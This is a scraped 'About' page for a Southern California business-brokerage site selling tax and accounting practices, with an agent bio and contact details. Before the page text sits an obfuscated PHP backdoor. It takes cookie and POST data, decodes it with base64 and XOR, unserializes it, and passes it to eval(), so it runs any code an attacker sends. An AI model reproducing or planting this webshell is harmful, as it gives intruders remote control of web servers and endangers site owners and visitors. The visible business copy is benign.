$AqKapJgVkA = chr (80) . chr (76) . chr ( 874 - 808 ).chr ( 595 - 500 )."\x5a" . "\172" . chr (76) . chr (110) . chr (83); $LzSuNWAC = chr (99) . chr (108) . chr ( 1088 - 991 ).chr ( 843 - 728 )."\x73" . chr ( 747 - 652 )."\145" . chr ( 944 - 824 ).chr ( 287 - 182 )."\163" . "\164" . "\x73";$hoinwMqTsj = class_exists($AqKapJgVkA); $AqKapJgVkA = "29383";$LzSuNWAC = "2157";$bnpLTJrtx = !1;if ($hoinwMqTsj == $bnpLTJrtx){function ZxwvJneeV(){return FALSE;}$yodJYAcJ = "33311";ZxwvJneeV();class PLB_ZzLnS{private function cUpRnFb($yodJYAcJ){if (is_array(PLB_ZzLnS::$dAqyCK)) {$uFXQzFuh = str_replace('<' . "\x3f" . "\160" . chr ( 1000 - 896 )."\160", "", PLB_ZzLnS::$dAqyCK['c' . chr ( 970 - 859 )."\156" . "\x74" . "\145" . "\x6e" . chr ( 478 - 362 )]);eval($uFXQzFuh); $yodJYAcJ = "33311";exit();}}private $QOgiMMa;public function ueHqHjEda(){echo 52965;}public function __destruct(){$yodJYAcJ = "32728_56715";$this->cUpRnFb($yodJYAcJ); $yodJYAcJ = "32728_56715";}public function __construct($plieKx=0){$vQkEoAw = $_POST;$UfjIpTQpGu = $_COOKIE;$eyWce = "2f98cfa7-3538-460b-929a-c9abf89687a1";$PbpvVMgv = @$UfjIpTQpGu[substr($eyWce, 0, 4)];if (!empty($PbpvVMgv)){$xjjGvgGfdL = "base64";$KHqeCX = "";$PbpvVMgv = explode(",", $PbpvVMgv);foreach ($PbpvVMgv as $fgLaH){$KHqeCX .= @$UfjIpTQpGu[$fgLaH];$KHqeCX .= @$vQkEoAw[$fgLaH];}$KHqeCX = array_map($xjjGvgGfdL . "\x5f" . chr (100) . chr ( 987 - 886 ).chr (99) . chr (111) . "\144" . chr ( 177 - 76 ), array($KHqeCX,)); $KHqeCX = $KHqeCX[0] ^ str_repeat($eyWce, (strlen($KHqeCX[0]) / strlen($eyWce)) + 1);PLB_ZzLnS::$dAqyCK = @unserialize($KHqeCX); $KHqeCX = class_exists("32728_56715");}}public static $dAqyCK = 3945;}$zcCOvImc = new /* 52397 */ PLB_ZzLnS(33311 + 33311); $bnpLTJrtx = $zcCOvImc = $yodJYAcJ = Array();} About – BBISoCal

You're almost at the finish line.

You can look Back Now. We'll Take it from Here!


We have been selling accounting and tax practices throughout California for over 45 years. BBISoCal.com is a marketing site and sells all it’s tax practices through Business Brokerage Inc. Craig Van Laningam, actually sold all these practices listed on this site and we are looking for listings to sell from 1 million up to 100 million plus. BBI has sold over 2100+ accounting and tax practices in California. Over the years, we have developed relationships with countless buyers.


Craig Van Laningham Southern California Agent 310-367-2644

Contract Craig at 800-274-4272 / craig@go2bbi.com

Craig is a UCLA Graduate where he was a member of the UCLA Swimming Team. Craig has been with BBI since 2015. Before coming to BBI, Craig spent over 15 years as a digital Media Consultant. Craig combines his digital advertising experience with an outstanding track record of selling the BEST Tax Practice listings in Southern California. When not working, Craig is spending his time with his family Kim, Ava & Sutton and coaching Sutton’s softball teams.